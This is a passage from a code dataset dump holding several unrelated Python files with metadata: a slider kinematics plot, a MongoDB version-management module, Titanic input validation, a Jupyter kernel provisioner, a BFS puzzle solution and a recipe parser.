#ratio12=-np.cos(th1)+(np.cos(th1)-np.sin(2*th1))*np.cos(th1)*(1-np.sin(th1))/b4ac1**1.5+(np.sin(th1)+2*np.cos(th1))/np.sqrt(b4ac1)\r\n dotTheta1=1.0/a11\r\n \r\n a12=-cs+(cs-ss*cs)*(cs-ss*cs)/np.power(b4ac1, 1.5)-(ss*ss-ss-cs*cs)/np.sqrt(b4ac1)\r\n #a12=a12/ratio1**2\r\n \r\n ddotTheta1=-a12*dotTheta1*dotTheta1/a11 \r\n X=X+DT\r\n x2p1=X*X+1\r\n a=4*x2p1\r\n b=-4*x2p1*X\r\n c=x2p1*x2p1-4\r\n cs3=(-b-np.sqrt(b*b-4*a*c))/(2*a)\r\n #cs2=(-b-np.sqrt(b*b-4*a*c))/(2*a)\r\n th3=-np.arccos(cs3)/d2r\r\n X3=np.cos(th3*d2r)\r\n Y3=np.sin(th3*d2r)\r\n ss=np.sin(th3*d2r)\r\n cs=np.cos(th3*d2r)\r\n ss4=-1-ss\r\n cs4=X-cs\r\n th4=np.arctan2(ss4,cs4)/d2r\r\n pressureangle2=th4-th3\r\n b4ac2=cs*cs-2*ss-1\r\n ratio2=-ss+(-cs*ss-cs)/np.sqrt(b4ac2)\r\n a31=ratio2\r\n X4=X3+cos(th4*d2r)\r\n Y4=Y3+sin(th4*d2r)\r\n dotTheta3=1.0/a31\r\n a32=-cs-(-cs-ss*cs)*(-cs-ss*cs)/np.power(b4ac2, 1.5)+(ss*ss+ss-cs*cs)/np.sqrt(b4ac2)\r\n ddotTheta3=-a32*dotTheta3*dotTheta3/a31\r\n oangle=th1[-1]-th1[0]-th3[-1]+th3[0]\r\n pangle=max(np.max(np.abs(pressureangle1-90)), np.max(np.abs(pressureangle2-90)))\r\n apangle=np.max((np.abs(pressureangle1-90)+np.abs(pressureangle2-90))/2.0)\r\n rangle=(np.abs((pressureangle1-90))+np.abs(pressureangle2-90))/2\r\n rangle=np.sqrt(np.mean(np.square(rangle)))\r\n rr_=np.max(np.abs(1.0/ratio1)+np.abs(1.0/ratio2))\r\n zz.append(oangle)\r\n pa.append(pangle)\r\n ap.append(apangle)\r\n rr.append(rr_)\r\n ra.append(rangle)\r\n aa.append(np.max(ddotTheta1))\r\n ratio_array.append( [rl, ll, oangle, pangle])\r\n \r\n ZZ.append(zz) \r\n PA.append(pa)\r\n RR.append(rr)\r\n AP.append(ap)\r\n RA.append(ra)\r\n AA.append(aa)\r\n \r\nfig, ax1 = plt.subplots()\r\n\r\n#ax2 = ax1.twinx()\r\n#ax1.plot(X-DT, ddotTheta1, 'b-')\r\n#ax2.plot(X-DT, ddotTheta3, 'r-')\r\n#\r\n#ax1.set_xlim([-1.65, .97])\r\n#ax1.set_xlabel('Slider Displacement (Unit L)')\r\n#ax1.set_ylabel(r'$\\ddot{\\theta}_1 (s^{-2})$', color='b')\r\n#ax2.set_ylabel(r'$\\ddot{\\theta}_3 (s^{-2})$', color='r')\r\nplt.plot(X-DT, ddotTheta3-ddotTheta1)\r\nplt.xlim(-1.65, .97)\r\nplt.xlabel('Slider Displacement (Unit L)')\r\nplt.ylabel(r'Relative Derivative Acceleration ($s^{-2}$)')\r\nplt.grid()\r\nplt.show()\r\n", "repo_name": "utbeaver/robot", "sub_path": "slider2d.py", "file_name": "slider2d.py", "file_ext": "py", "file_size_in_byte": 3829, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "matplotlib.pyplot.close", "line_number": 15, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 15, "usage_type": "name"}, {"api_name": "numpy.pi", "line_number": 17, "usage_type": "name"}, {"api_name": "numpy.meshgrid", "line_number": 23, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.arccos", "line_number": 49, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 50, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 51, "usage_type": "call"}, {"api_name": "numpy.arctan2", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 59, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 61, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 62, "usage_type": "call"}, {"api_name": "numpy.power", "line_number": 66, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 66, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 75, "usage_type": "call"}, {"api_name": "numpy.arccos", "line_number": 77, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 79, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 80, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 81, "usage_type": "call"}, {"api_name": "numpy.arctan2", "line_number": 84, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 87, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 89, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 90, "usage_type": "call"}, {"api_name": "numpy.power", "line_number": 92, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 92, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 95, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 95, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 96, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 96, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 97, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 98, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 98, "usage_type": "call"}, {"api_name": "numpy.square", "line_number": 98, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 99, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 99, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 105, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 115, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 115, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 125, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 125, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 126, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 126, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 127, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 127, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 128, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 128, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 129, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 129, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 130, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 130, "usage_type": "name"}]} +{"seq_id": "42761497758", "text": "# -*- coding: utf-8 -*-\n\"\"\"\n@Time: 2021/1/15 9:20\n@Auth: money\n@File: systems.py\n\"\"\"\nimport time\n\nfrom bson.son import SON\n\nfrom initialize import client\nfrom initialize import init_stamp\nfrom constant import constant\nfrom utils.util import generate_uid\n\n\ndef queryVersionList(page, num):\n dataList = []\n count = 0\n error = None\n try:\n pipeline = [\n {\"$match\": {\"state\": 1}},\n {\"$sort\": SON([(\"create_time\", -1)])},\n {\"$skip\": (int(page) - 1) * int(num)},\n {\"$limit\": int(num)},\n {\n \"$project\": {\n \"_id\": 0, \"uid\": 1, \"version_name\": 1, \"version_str\": 1, \"option\": 1, \"desc\": 1, \"tip_way\": 1,\n \"link\": {\"$concat\": [constant.DOMAIN, \"$link\"]}, \"version_num\": 1, \"create_time\": 1, \"size\": 1\n }\n }\n ]\n\n dataList = list(client[\"version\"].aggregate(pipeline))\n count = client[\"version\"].find({\"state\": 1}).count()\n except Exception as e:\n error = e\n finally:\n return dataList, count, error\n\n\ndef deleteVersion(uid):\n error = None\n try:\n doc = client[\"version\"].find_one({\"uid\": uid}, {\"is_latest\": 1})\n client[\"version\"].update_one({\"uid\": uid}, {\"$set\": {\"state\": -1}})\n if doc:\n if doc.get(\"is_latest\"):\n tmp = client[\"version\"].find_one({\"state\": 1}, {\"uid\": 1, \"version_str\": 1, \"desc\": 1, \"tip_way\": 1},\n sort=[(\"version_num\", -1)])\n if tmp:\n client[\"version\"].update_one({\"uid\": tmp.get(\"uid\")}, {\"$set\": {\"is_latest\": True}})\n if tmp.get(\"tip_way\") != 1:\n sendAllUserUpateVersion(tmp.get(\"version_str\"), tmp.get(\"desc\"))\n except Exception as e:\n error = e\n finally:\n return error\n\n\ndef queryVersionNo(version_str, version_num):\n result1 = False\n result2 = False\n error = None\n try:\n doc = client[\"version\"].find_one({\"version_str\": version_str, \"state\": 1})\n if doc:\n result1 = True\n doc = client[\"version\"].find_one({\"version_num\": version_num, \"state\": 1})\n if doc:\n result2 = True\n except Exception as e:\n error = e\n finally:\n return result1, result2, error\n\n\ndef insertVersion(uid, name, version_str, option, link, size, desc, version_num, tip_way):\n error = None\n try:\n\n updateAllVersionLatestISFalse()\n client[\"version\"].insert(\n {\n \"uid\": uid, \"version_name\": name, \"version_str\": str(version_str), \"option\": option, \"tip_way\": tip_way,\n \"link\": link, \"size\": float(size), \"create_time\": int(time.time() * 1000), \"desc\": str(desc),\n \"update_time\": int(time.time() * 1000), \"version_num\": version_num, \"state\": 1, \"is_latest\": True\n }\n )\n if tip_way != 1:\n sendAllUserUpateVersion(version_str, desc)\n except Exception as e:\n error = e\n finally:\n return error\n\n\ndef updateVersion(uid, name, version_str, version_num, option, desc, link, size, tip_way):\n error = None\n try:\n updateAllVersionLatestISFalse()\n client[\"version\"].update_one(\n {\"uid\": uid},\n {\n \"$set\": {\n \"version_name\": name, \"version_str\": version_str, \"version_num\": version_num, \"option\": option,\n \"desc\": desc, \"link\": link, \"size\": float(size), \"tip_way\": tip_way, \"is_latest\": True\n }\n }\n )\n if tip_way != 1:\n sendAllUserUpateVersion(version_str, desc)\n except Exception as e:\n error = e\n finally:\n return error\n\n\ndef queryAllVersionNo(uid, version_str, version_num):\n result1 = False\n result2 = False\n error = None\n try:\n tmp = client[\"version\"].find_one({\"uid\": uid, \"state\": 1}, {\"version_str\": 1, \"version_num\": 1})\n if tmp:\n if version_str != tmp.get(\"version_str\"):\n tmp1 = client[\"version\"].find_one({\"version_str\": version_str, \"state\": 1}, {\"_id\": 1})\n if tmp1:\n result1 = True\n if version_num != tmp.get(\"version_num\"):\n tmp2 = client[\"version\"].find_one({\"version_num\": version_num, \"state\": 1}, {\"_id\": 1})\n if tmp2:\n result2 = True\n else:\n raise Exception(\"uid is not exists\")\n except Exception as e:\n error = e\n finally:\n return result1, result2, error\n\n\ndef queryVersionNoList():\n dataList = []\n error = None\n try:\n cursor = client[\"version\"].find({\"state\": 1}, {\"_id\": 0, \"version_str\": 1, \"is_latest\": 1})\n dataList = [doc for doc in cursor]\n except Exception as e:\n error = e\n finally:\n return dataList, error\n\n\ndef postLatestVersionNo(version_str):\n error = None\n try:\n updateAllVersionLatestISFalse()\n client[\"version\"].update_one({\"version_str\": version_str, \"state\": 1}, {\"$set\": {\"is_latest\": True}})\n doc = client[\"version\"].find_one({\"version_str\": version_str, \"state\": 1},\n {\"uid\": 1, \"version_str\": 1, \"desc\": 1, \"tip_way\": 1})\n if doc.get(\"tip_way\") != 1:\n sendAllUserUpateVersion(doc.get(\"version_str\"), doc.get(\"desc\"))\n except Exception as e:\n error = e\n finally:\n return error\n\n\ndef updateAllVersionLatestISFalse():\n client[\"version\"].update({\"state\": 1}, {\"$set\": {\"is_latest\": False}}, multi=True)\n\n\ndef sendAllUserUpateVersion(version_str, desc):\n error = None\n try:\n uid = generate_uid(24)\n cursor = client[\"user\"].find({\"state\": {\"$in\": [0, 1]}})\n for d in cursor:\n client[\"message\"].insert(\n {\n \"uid\": uid, \"user_id\": d.get(\"uid\"), \"push_people\": \"系统消息\",\n \"desc\": f\"发现新版本V{version_str}, 请更新。版本描述:{desc}\", \"type\": 2,\n \"state\": 1, \"create_time\": int(time.time() * 1000), \"update_time\": int(time.time() * 1000)}\n )\n except Exception as e:\n error = e\n finally:\n return error\n", "repo_name": "coinsccg/microfotos", "sub_path": "dao/admin/systems/systems.py", "file_name": "systems.py", "file_ext": "py", "file_size_in_byte": 6269, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "bson.son.SON", "line_number": 24, "usage_type": "call"}, {"api_name": "constant.constant.DOMAIN", "line_number": 30, "usage_type": "attribute"}, {"api_name": "constant.constant", "line_number": 30, "usage_type": "name"}, {"api_name": "initialize.client", "line_number": 35, "usage_type": "name"}, {"api_name": "initialize.client", "line_number": 36, "usage_type": "name"}, {"api_name": "initialize.client", "line_number": 46, "usage_type": "name"}, {"api_name": "initialize.client", "line_number": 47, "usage_type": "name"}, {"api_name": "initialize.client", "line_number": 50, "usage_type": "name"}, {"api_name": "initialize.client", "line_number": 53, "usage_type": "name"}, {"api_name": "initialize.client", "line_number": 67, "usage_type": "name"}, {"api_name": "initialize.client", "line_number": 70, "usage_type": "name"}, {"api_name": "initialize.client", "line_number": 84, "usage_type": "name"}, {"api_name": "time.time", "line_number": 87, "usage_type": "call"}, {"api_name": "time.time", "line_number": 88, "usage_type": "call"}, {"api_name": "initialize.client", "line_number": 103, "usage_type": "name"}, {"api_name": "initialize.client", "line_number": 125, "usage_type": "name"}, {"api_name": "initialize.client", "line_number": 128, "usage_type": "name"}, {"api_name": "initialize.client", "line_number": 132, "usage_type": "name"}, {"api_name": "initialize.client", "line_number": 147, "usage_type": "name"}, {"api_name": "initialize.client", "line_number": 159, "usage_type": "name"}, {"api_name": "initialize.client", "line_number": 160, "usage_type": "name"}, {"api_name": "initialize.client", "line_number": 171, "usage_type": "name"}, {"api_name": "utils.util.generate_uid", "line_number": 177, "usage_type": "call"}, {"api_name": "initialize.client", "line_number": 178, "usage_type": "name"}, {"api_name": "initialize.client", "line_number": 180, "usage_type": "name"}, {"api_name": "time.time", "line_number": 184, "usage_type": "call"}]} +{"seq_id": "24403539017", "text": "from typing import List, Dict\n\nfrom pymongo import MongoClient\n\nfrom projects.entities.project import ProjectSchema\nfrom projects.use_cases.abstract_projects_repository import AbstractProjectsRepository\n\n\nclass MongoProjectsRepository(AbstractProjectsRepository):\n def __init__(self) -> None:\n self._schema = ProjectSchema()\n\n def get(self) -> List[ProjectSchema]:\n client = MongoClient(\n 'mongodb://mongo:27017/',\n socketTimeoutMS=3000,\n connectTimeoutMS=3000,\n serverSelectionTimeoutMS=3000\n )\n database = client.projects\n collection = database.projects\n\n return list(map(self._load, collection.find()))\n\n def _load(self, data: Dict) -> ProjectSchema:\n project = self._schema.load(data) # type: ProjectSchema\n return project\n", "repo_name": "jdgillespie91/projects-api", "sub_path": "projects/adapters/mongo_projects_repository.py", "file_name": "mongo_projects_repository.py", "file_ext": "py", "file_size_in_byte": 837, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "projects.use_cases.abstract_projects_repository.AbstractProjectsRepository", "line_number": 9, "usage_type": "name"}, {"api_name": "projects.entities.project.ProjectSchema", "line_number": 11, "usage_type": "call"}, {"api_name": "pymongo.MongoClient", "line_number": 14, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 13, "usage_type": "name"}, {"api_name": "projects.entities.project.ProjectSchema", "line_number": 13, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 25, "usage_type": "name"}, {"api_name": "projects.entities.project.ProjectSchema", "line_number": 25, "usage_type": "name"}]} +{"seq_id": "9307183701", "text": "from typing import List, Optional, Tuple\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom pydantic import BaseModel, ValidationError\r\n\r\nfrom classification_model.config.core import config\r\n\r\n# from marshmallow import Schema, ValidationError, fields\r\n\r\n\r\ndef replace_interrogation_marks(*, input_data: pd.DataFrame) -> pd.DataFrame:\r\n \"\"\"replace interrogation marks by NaN values\"\"\"\r\n\r\n replaced_interrogation_data = input_data.copy().replace(\"?\", np.nan)\r\n\r\n return replaced_interrogation_data\r\n\r\n\r\ndef validate_inputs(*, input_data: pd.DataFrame) -> Tuple[pd.DataFrame, Optional[dict]]:\r\n \"\"\"Check model inputs for unprocessable values.\"\"\"\r\n\r\n # convert syntax error field names (beginning with numbers)\r\n input_data.rename(columns=config.model_config.variables_to_rename, inplace=True)\r\n\r\n # replace interrogation marks by NaN values\r\n validated_data = replace_interrogation_marks(input_data=input_data)\r\n\r\n errors = None\r\n\r\n # cast numerical variables as floats\r\n for var in config.model_config.numerical_vars:\r\n validated_data[var] = validated_data[var].astype(\"float\")\r\n\r\n try:\r\n # replace numpy nans so that pydantic can validate\r\n MultipleTitanicDataInputs(\r\n inputs=validated_data.replace({np.nan: None}).to_dict(orient=\"records\")\r\n )\r\n except ValidationError as error:\r\n errors = {e[\"loc\"][-1]: e[\"msg\"] for e in error.errors()}\r\n\r\n return validated_data, errors\r\n\r\n\r\nclass TitanicDataInputSchema(BaseModel):\r\n pclass: Optional[int]\r\n name: Optional[str]\r\n sex: Optional[str]\r\n age: Optional[float]\r\n sibsp: Optional[int]\r\n parch: Optional[int]\r\n ticket: Optional[str]\r\n fare: Optional[float]\r\n cabin: Optional[str]\r\n embarked: Optional[str]\r\n boat: Optional[str]\r\n body: Optional[float]\r\n home_dest: Optional[str]\r\n\r\n\r\nclass MultipleTitanicDataInputs(BaseModel):\r\n inputs: List[TitanicDataInputSchema]\r\n", "repo_name": "vinaykumarkonda/deployment_and_testing_of_machine_learning_model", "sub_path": "classification_model/processing/validation.py", "file_name": "validation.py", "file_ext": "py", "file_size_in_byte": 1943, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pandas.DataFrame", "line_number": 12, "usage_type": "attribute"}, {"api_name": "numpy.nan", "line_number": 15, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 20, "usage_type": "attribute"}, {"api_name": "classification_model.config.core.config.model_config", "line_number": 24, "usage_type": "attribute"}, {"api_name": "classification_model.config.core.config", "line_number": 24, "usage_type": "name"}, {"api_name": "classification_model.config.core.config.model_config", "line_number": 32, "usage_type": "attribute"}, {"api_name": "classification_model.config.core.config", "line_number": 32, "usage_type": "name"}, {"api_name": "numpy.nan", "line_number": 38, "usage_type": "attribute"}, {"api_name": "pydantic.ValidationError", "line_number": 40, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 20, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 20, "usage_type": "name"}, {"api_name": "pydantic.BaseModel", "line_number": 46, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 47, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 48, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 49, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 50, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 51, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 52, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 53, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 54, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 55, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 56, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 57, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 58, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 59, "usage_type": "name"}, {"api_name": "pydantic.BaseModel", "line_number": 62, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 63, "usage_type": "name"}]} +{"seq_id": "72287397955", "text": "from googlesearch import search\nfrom random import choice\nimport webbrowser\nimport easygui as eg\n\neg.msgbox(msg=\"Tell me what you would like in a project and I shall search Google for you. This will trigger 3 pop up windows\", title=\"InPIration\", ok_button=\"Inspire Me!\")\nthings = []\nsuggestion = []\n\nfor i in range(3):\n things.append(eg.enterbox(msg=\"READY >>> \"))\n\ninspiration = str(things[0]+\" \"+things[1]+\" \"+things[2])\nprint(inspiration) #Debug\n\nfor item in search(inspiration, tld=\"co.uk\", num=3, stop=1, pause=2):\n print(item)\n suggestion.append(item)\n\nfor i in range(len(suggestion)):\n links = \"\\n\".join(suggestion[0:])\n \neg.textbox(msg=\"Hey I found these that might be of interest, I'll open one at random after you close this message\", text=links)\n \nwebbrowser.open(choice(suggestion))\n", "repo_name": "lesp/LXF249-InsPIration", "sub_path": "Inspiratron.py", "file_name": "Inspiratron.py", "file_ext": "py", "file_size_in_byte": 813, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "easygui.msgbox", "line_number": 6, "usage_type": "call"}, {"api_name": "easygui.enterbox", "line_number": 11, "usage_type": "call"}, {"api_name": "googlesearch.search", "line_number": 16, "usage_type": "call"}, {"api_name": "easygui.textbox", "line_number": 23, "usage_type": "call"}, {"api_name": "webbrowser.open", "line_number": 25, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 25, "usage_type": "call"}]} +{"seq_id": "44244809551", "text": "import io\nimport json\nimport logging\nimport os\nimport shlex\nimport subprocess\nimport tempfile\nimport typing\n\nfrom .base import HydraKernelProvisioner\n\nif typing.TYPE_CHECKING:\n from typing import Any, Dict, List, Optional\n\nLOG = logging.getLogger(__name__)\n\n\nclass LocalHydraKernelProvisioner(HydraKernelProvisioner):\n poll_interval = 0.1 # Checking local processes is cheap\n\n pid = None\n\n @property\n def has_process(self) -> bool:\n return self.pid is not None\n\n def reset(self):\n self.pid = None\n\n async def pre_launch(self, **kwargs: \"Any\") -> \"Dict[str, Any]\":\n kwargs = await super().pre_launch(**kwargs)\n # Override the kernel command; we need to spawn a background kernel\n # which requires using the agent wrapper.\n kwargs[\"cmd\"] = [\n \"hydra-agent\",\n f\"--kernel={self.binding.kernel}\",\n f\"--id={self.kernel_id}\",\n \"--debug\",\n ]\n return kwargs\n\n async def launch_kernel(self, command: \"List[str]\", **kwargs):\n command = [shlex.quote(arg) for arg in command]\n # In a kernel context, the STDOUT and STDERR file descriptors are\n # already piped to the iopub channel. Using `capture_output` will\n # pipe those fds again, which ends up deadlocking subprocess.run.\n # Instead, pipe both stdout and stderr to a temporary file.\n with tempfile.TemporaryFile() as tmpf:\n process = subprocess.run(\n command,\n stdout=tmpf,\n stderr=tmpf,\n )\n # Reset stream for reading\n tmpf.seek(0)\n stdout = io.BytesIO(tmpf.read())\n if process.returncode > 0:\n raise RuntimeError(stdout.read())\n subkernel = json.load(stdout)\n\n self.pid = subkernel[\"pid\"]\n conn_info = subkernel[\"connection\"]\n\n LOG.info(f\"{self.binding.name}: connection={conn_info}\")\n\n return conn_info\n\n async def send_signal(self, signum: int) -> None:\n try:\n LOG.debug(f\"kill -{signum} {self.pid}\")\n os.kill(self.pid, signum)\n except ProcessLookupError:\n self.reset()\n\n async def poll(self) -> \"Optional[int]\":\n try:\n os.kill(self.pid, 0)\n except OSError:\n return -1\n", "repo_name": "ChameleonCloud/jupyterlab-chameleon", "sub_path": "hydra_kernel/provisioning/local.py", "file_name": "local.py", "file_ext": "py", "file_size_in_byte": 2336, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "61", "api": [{"api_name": "typing.TYPE_CHECKING", "line_number": 12, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 15, "usage_type": "call"}, {"api_name": "base.HydraKernelProvisioner", "line_number": 18, "usage_type": "name"}, {"api_name": "shlex.quote", "line_number": 43, "usage_type": "call"}, {"api_name": "tempfile.TemporaryFile", "line_number": 48, "usage_type": "call"}, {"api_name": "subprocess.run", "line_number": 49, "usage_type": "call"}, {"api_name": "io.BytesIO", "line_number": 56, "usage_type": "call"}, {"api_name": "json.load", "line_number": 59, "usage_type": "call"}, {"api_name": "os.kill", "line_number": 71, "usage_type": "call"}, {"api_name": "os.kill", "line_number": 77, "usage_type": "call"}]} +{"seq_id": "6505285017", "text": "# 230215 14666 소가 길을 건너간 이유 6\n\nimport sys\nfrom collections import deque\nfrom itertools import combinations\n\n# (0,0)에서 bfs 시행. visited 체크\n# cows중에 visited에 체크 안된 애들은 절대 못감 -> 빼고\n# 경우의 수(조합) 카운트\n\ninput = sys.stdin.readline\n\ndef bfs(start):\n global n, roads, visited, moves,answer\n\n queue = deque([start])\n visited[start[0]][start[1]] = 1\n\n while queue:\n now = queue.popleft()\n\n for move in moves:\n nxtR, nxtC = now[0] + move[0], now[1] + move[1]\n\n if 0 <= nxtR < n and 0 <= nxtC < n:\n if visited[nxtR][nxtC] == 0 and [nxtR,nxtC] not in roads[now[0]][now[1]]:\n queue.append([nxtR,nxtC])\n visited[nxtR][nxtC] = 1\n answer.add((tuple(start),(nxtR,nxtC)))\n\n\nn, k, r = map(int,input().split())\nroads = [[[] for i in range(n)] for j in range(n)]\n\nfor _ in range(r):\n a,b, x,y = map(int,input().split())\n roads[a-1][b-1].append([x-1,y-1])\n roads[x-1][y-1].append([a-1,b-1])\n\ncows = []\n\nfor _ in range(k):\n x, y = list(map(int,input().split()))\n cows.append((x-1,y-1))\n\nstartToEnd = set(combinations(cows,2))\n\nanswer = set()\nmoves = [[0,1],[0,-1],[1,0],[-1,0]]\nfor cow in cows:\n visited = [[0]*n for _ in range(n)]\n if visited[cow[0]][cow[1]] == 0:\n bfs(cow)\n\nprint(len(startToEnd.difference(answer)))", "repo_name": "seho27060/TIL", "sub_path": "Problem-Sovling/2023-02/230215_Algorithm/BOJ_14466_소가-건너지-건너간-이유-6.py", "file_name": "BOJ_14466_소가-건너지-건너간-이유-6.py", "file_ext": "py", "file_size_in_byte": 1418, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "sys.stdin", "line_number": 11, "usage_type": "attribute"}, {"api_name": "collections.deque", "line_number": 16, "usage_type": "call"}, {"api_name": "itertools.combinations", "line_number": 46, "usage_type": "call"}]} +{"seq_id": "10761984124", "text": "\n# coding: utf-8\n\n# In[153]:\n\n\nimport json,os,sys,re\n\n\n# In[32]:\n\n\n# f= open('/home/nishant/Downloads/allRecipesInStructure.txt','r')\n\n\n# In[154]:\n\n\nwith open('C:/Users/jaiu978/Desktop/allRecipesInStructure.txt','r') as myfile:\n data=myfile.read()\n\n\n# In[155]:\n\n\nflis=data.split('\\n')\n\n\n# In[156]:\n\n\nflis = list(filter(None, flis))\n# print(str_list)\n\n\n# In[157]:\n\n\nrecipe=[]\n\n\n# In[158]:\n\n\nstrt=re.compile('START RECIPE')\ning=re.compile('INGREDIENTS')\ndirec=re.compile('DIRECTIONS')\n\n\n# In[159]:\n\n\nunit=['cup','tbsp','tablespoon','teaspoon','ounce']\n\n\n# In[160]:\n\n\nfor idx,i in enumerate(flis):\n# print(i)\n if strt.search(i):\n recipe.append(idx)\n\n\n# In[161]:\n\n\na=[(x,y) for x,y in zip(recipe,recipe[1:])]\n# print(lis[a[0][0]:a[0][1]])\n\n\n# In[165]:\n\n\nfor j in a:\n lis=flis[j[0]:j[1]]\n out={}\n out['id']=''\n out['RecipeName']=''\n out['Ingredients']=[]\n out['instructions']=''\n for idx,i in enumerate(lis):\n # print(i)\n if strt.search(i):\n s_id=idx\n elif ing.search(i):\n i_id=idx\n elif direc.search(i):\n d_id=idx\n# print(not i_id)\n for k in lis[s_id+1:i_id]:\n if re.search('([A-Z\\s]){1,}$',k.strip()) and 'recipe by' not in k.lower():\n\n out['RecipeName']=k.strip()\n if not out['RecipeName']:\n try:\n out['RecipeName']=lis[s_id+1]\n except IndexError:\n continue\n\n for idx,k in enumerate(lis[i_id+1:d_id]):\n dic={}\n dic['i_id']=''\n try:\n dic['quantity']=re.match('([\\d/.\\- ]){1,}',k).group(0)\n except AttributeError:\n dic['quantity']=''\n\n try:\n dic['unit']=unit[[i for i, j in enumerate([re.search(x,k.lower()) for x in unit]) if j is not None][0]]\n except IndexError:\n dic['unit']=''\n if dic['unit']:\n re.search\n # print(dic['quantity'])\n qty=re.compile(dic['quantity'])\n ingr=re.sub(dic['unit'],'',k)\n ingr=re.sub(dic['quantity'],'',ingr).strip()\n dic['ingredientName']=re.sub('^(s )','',ingr)\n out['Ingredients'].append(dic)\n out['instructions']=' '.join(lis[d_id+1:])\n\n print(json.dumps(out))\n\n", "repo_name": "jaiutkarsh02/Recipe_list", "sub_path": "recipe_final.py", "file_name": "recipe_final.py", "file_ext": "py", "file_size_in_byte": 2209, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "re.compile", "line_number": 45, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 46, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 47, "usage_type": "call"}, {"api_name": "re.search", "line_number": 92, "usage_type": "call"}, {"api_name": "re.match", "line_number": 105, "usage_type": "call"}, {"api_name": "re.search", "line_number": 110, "usage_type": "call"}, {"api_name": "re.search", "line_number": 114, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 116, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 117, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 118, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 119, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 123, "usage_type": "call"}]} +{"seq_id": "19825995544", "text": "# coding=utf-8\n\"\"\" В 